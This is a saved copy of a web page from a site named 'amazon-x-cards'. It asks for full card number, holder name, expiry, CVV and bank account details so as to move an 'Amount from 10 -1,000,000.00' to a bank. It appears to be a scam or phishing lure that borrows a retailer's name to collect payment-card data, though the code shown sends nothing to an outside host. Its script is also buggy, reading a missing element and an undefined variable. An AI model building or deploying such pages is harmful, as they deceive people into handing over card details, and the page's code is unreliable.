<!DOCTYPE html>
<!-- saved from url=(0048)https://amazon-x-cards.vercel.app/atm/index.html -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <!-- custom css file link  -->
    <link rel="stylesheet" href="./atm_files/style.css">

</head>
<body style="color: #000;">

<div class="container">

    <div class="card-container">

        <div class="front">
            <div class="image">
                <img src="./atm_files/chip.png" alt="">
                <img src="./atm_files/master.png" alt="">
            </div>
            <div class="card-number-box"></div>
            <div class="flexbox">
                <div class="box">
                    <span>card holder <a href="atm.html"></a></span>
                    <div class="card-holder-name">full name</div>
                </div>
                <div class="box">
                    <span>expires</span>
                    <div class="expiration">
                        <span class="exp-month">mm</span>
                        <span class="exp-year">yy</span>
                    </div>
                </div>
            </div>
        </div>
       

        <div class="back">
            <div class="stripe"></div>
            <div class="box">
                <span>cvv</span>
                <div class="cvv-box"></div>
                <img src="./atm_files/master.png" alt="">
            </div>
        </div>

    </div>

    <form action="successful.html">
        <div class="inputBox">
            <!-- <span>card number</span> -->
            <input type="text" maxlength="20" class="card-number-input" placeholder="Card Number" required="">
        </div>
        <div class="inputBox">
            <!-- <span>card holder</span> -->
            <input type="text" class="card-holder-input" placeholder="card holder" required="">
        </div>
        <div class="flexbox">
            <div class="inputBox">
                <!-- <span>expiration mm</span> -->
                <select name="" id="" class="month-input">
                    <option value="month" selected="" disabled="">month</option>
                    <option value="01">01</option>
                    <option value="02">02</option>
                    <option value="03">03</option>
                    <option value="04">04</option>
                    <option value="05">05</option>
                    <option value="06">06</option>
                    <option value="07">07</option>
                    <option value="08">08</option>
                    <option value="09">09</option>
                    <option value="10">10</option>
                    <option value="11">11</option>
                    <option value="12">12</option>
                </select>
            </div>
            <div class="inputBox">
                <!-- <span>expiration yy</span> -->
                <select name="" id="" class="year-input">
                    <option value="year" selected="" disabled="">year</option>
                    <option value="2021">2021</option>
                    <option value="2022">2022</option>
                    <option value="2023">2023</option>
                    <option value="2024">2024</option>
                    <option value="2025">2025</option>
                    <option value="2026">2026</option>
                    <option value="2027">2027</option>
                    <option value="2028">2028</option>
                    <option value="2029">2029</option>
                    <option value="2030">2030</option>
                </select>
            </div>
            <div class="inputBox">
                <!-- <span>cvv</span> -->
                <input type="text" maxlength="4" class="cvv-input" placeholder="cvv">
            </div>
        </div> <br>
        <h3 style="text-align: center;">To which Bank?</h3>

        <div class="inputBox">
        
            <input type="text" maxlength="" class="card-number-input" placeholder="Bank Name" required=""> 
        </div>
        <div class="inputBox">
           
            <input type="text" class="card-holder-input" placeholder="Account Number" required=""> <br> <br>
            <input type="text" class="card-holder-input" id="txt" placeholder="Account Name" required=""> <br> <br>
            <input type="text" id="name" placeholder="Amount from 10 -1,000,000.00" maxlength="6" required=""> 
            <!-- <a href="">ddhdhdh</a> -->
        </div>
        <input type="submit" value="submit" class="submit-btn" onclick="passvalue();">

        
    </form>
    <script>
        function passvalue(){
            var firstname=document.getElementById("txt").value;      
            localStorage.setItem("textvalue", firstname);
             
            var lastname=document.getElementById("name").value;
            localStorage.setItem("textname", lastname);

            var middlename=document.getElementById("bank").value;
            localStorage.setItem("textmiddle", middlname);
            
            
        }
      
 
    </script>
</div>    
    





<script>

document.querySelector('.card-number-input').oninput = () =>{
    document.querySelector('.card-number-box').innerText = document.querySelector('.card-number-input').value;
}

document.querySelector('.card-holder-input').oninput = () =>{
    document.querySelector('.card-holder-name').innerText = document.querySelector('.card-holder-input').value;
}

document.querySelector('.month-input').oninput = () =>{
    document.querySelector('.exp-month').innerText = document.querySelector('.month-input').value;
}

document.querySelector('.year-input').oninput = () =>{
    document.querySelector('.exp-year').innerText = document.querySelector('.year-input').value;
}

document.querySelector('.cvv-input').onmouseenter = () =>{
    document.querySelector('.front').style.transform = 'perspective(1000px) rotateY(-180deg)';
    document.querySelector('.back').style.transform = 'perspective(1000px) rotateY(0deg)';
}

document.querySelector('.cvv-input').onmouseleave = () =>{
    document.querySelector('.front').style.transform = 'perspective(1000px) rotateY(0deg)';
    document.querySelector('.back').style.transform = 'perspective(1000px) rotateY(180deg)';
}

document.querySelector('.cvv-input').oninput = () =>{
    document.querySelector('.cvv-box').innerText = document.querySelector('.cvv-input').value;
}

</script>








</body></html>
